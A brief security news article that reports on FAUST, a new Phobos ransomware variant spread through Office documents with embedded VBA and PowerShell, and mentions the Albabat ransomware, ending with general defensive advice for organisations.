Phobos ransomware has a new variant called FAUST

A new variant of the infamous Phobos ransomware, FAUST, has recently appeared in the threat landscape.

Based on reports, this latest iteration represents an expansion of the Phobos strain. As of now, FAUST is the newest addition to the growing family of Phobos, joining Eking, Eight, Elbie, Devos, and 8Base.

Researchers stated that FAUST’s unique capability is its utilisation of an Office document for propagation, which is a different approach from a Phobos attack vector.

 

The FAUST variant leverages a particular document that contains a malicious script.

 

The FAUST infection chain begins with an XLAM document that stores an embedded VBA script. Once a target accesses the document, the attack will trigger a PowerShell command that leads to the download of Base-64 encoded data from the Gitea service.

Subsequently, the operation will save the data in an XLSX file, which covertly recovers an executable posing as an AVG antivirus software updater. The deceptive executable is a downloader that would launch another executable called SmartScreen Defender Windows.exe. This executable employs a fileless attack to initiate the encryption process.

One of the confirmed capabilities of FAUST ransomware includes appending the [.]faust extension to encrypted files and generating info.txt and info—hta files within directories for communicating with attackers during ransom negotiations.

Interestingly, to avoid system damage and prevent the encryption of ransom information, FAUST excludes specific file extensions, directories, and filenames. The ransomware also has configurable decryption features and employs several threads for diverse tasks, such as encryption deployment, file scanning, and locating specific database-related files.

However, these threats do not stop with FAUST, as two new ransomware families have also emerged recently. Albabat, alias White Bat, disguises itself as a fake Windows 10 digital activation tool and cheat program for Counter-Strike 2.

The researchers said this ransomware employs BYOVD attacks to turn off antivirus software before encrypting files, resembling the notorious BlackMatter ransomware.

The constant evolution of ransomware shows the need for organisations to improve their cybersecurity defences. Protecting endpoints, regularly backing up files, and ensuring all software is updated are crucial measures for thwarting such malicious activities.

Additionally, leveraging IOCs associated with ransomware can significantly enhance proactive defence strategies, helping organisations stay ahead of the ever-changing cybercriminal landscape.